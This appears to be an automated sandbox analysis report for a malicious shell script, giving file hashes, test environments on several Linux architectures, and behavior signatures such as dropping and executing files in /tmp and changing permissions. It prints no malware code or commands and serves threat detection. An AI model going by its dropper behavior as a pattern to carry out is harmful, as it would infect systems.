Analysis
-
max time kernel
92s -
max time network
95s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
25/11/2024, 02:54
Static task
static1
Behavioral task
behavioral1
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
-
Size
10KB
-
MD5
b643808c01faa0f92bf870288eb8dd16
-
SHA1
494306996b3ee0573b6da340ee334523cd39f9eb
-
SHA256
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad
-
SHA512
f8e2bed091a7cf127f3feadc979a7ee81e9835a68b98f78afc737f354cdf3348e42f4551cc47d805e0734fd77e02963e665aad84c33c02e18395f86754ae24cb
-
SSDEEP
96:+Hb3G9hf3INVTX1G+Emzer6e0D7tAokHbrf3+PTX1G+1emzer6wN6W:+Hb3VvTX1G+EmzereTX1G+Mmzerx
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
File opened for reading: /proc/sys/crypto/fips_enabled (process: curl)
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97